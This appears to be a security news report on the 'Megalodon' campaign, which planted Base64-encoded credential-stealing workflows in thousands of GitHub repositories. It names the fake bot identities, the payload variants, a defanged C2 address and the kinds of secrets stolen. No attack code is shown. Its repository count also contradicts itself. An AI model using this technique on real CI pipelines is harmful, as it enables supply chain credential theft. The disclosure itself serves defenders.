Skip to content

Megalodon Cyberattack: 5,561 GitHub Repositories Infiltrated with Malicious CI/CD Workflows

The Bottom Line: The Megalodon campaign has infiltrated over 5,700 GitHub repositories with malicious CI/CD workflows and stolen sensitive credentials. Attackers used fake identities and hidden Base64 payloads to harvest cloud credentials, SSH keys, and API keys at scale.

Security researchers have disclosed an automated campaign named Megalodon that injected 5,718 malicious commits into 5,561 GitHub repositories within a six-hour window. The attackers used disposable accounts and fake author identities to steal sensitive data including cloud credentials, SSH keys, and API keys.

Security researchers have published details about a new automated campaign named Megalodon that injected 5,718 malicious commits into 5,561 GitHub repositories within a six-hour window. The attackers used throwaway accounts and fake author identities such as build-bot, auto-ci, ci-bot, and pipeline-bot. They injected GitHub Actions workflows with Base64-encoded Bash payloads that exfiltrated CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets to a C2 server at 216.126.225[.]129:8443.

The stolen data includes CI environment variables, AWS and Google Cloud credentials, instance role credentials from AWS, Google Cloud, and Microsoft Azure, SSH private keys, Docker and Kubernetes configurations, vault tokens, Terraform credentials, shell history, API keys, database connection strings, JWTs, PEM private keys, and cloud tokens. Additionally, GitHub Actions OIDC tokens, GITHUB_TOKEN, GitLab and Bitbucket tokens, and configuration files such as .env and credentials.json were compromised.

The attackers rotated four author names and seven commit messages that mimicked routine CI maintenance. They leveraged randomly generated GitHub accounts and compromised personal access tokens or deploy keys. Two payload variants were observed: SysDiag, triggered on every push and pull request, and Optimize-Build, activated only through manual triggering. The campaign demonstrates the scale of modern supply chain attacks targeting the software development community.

Share on: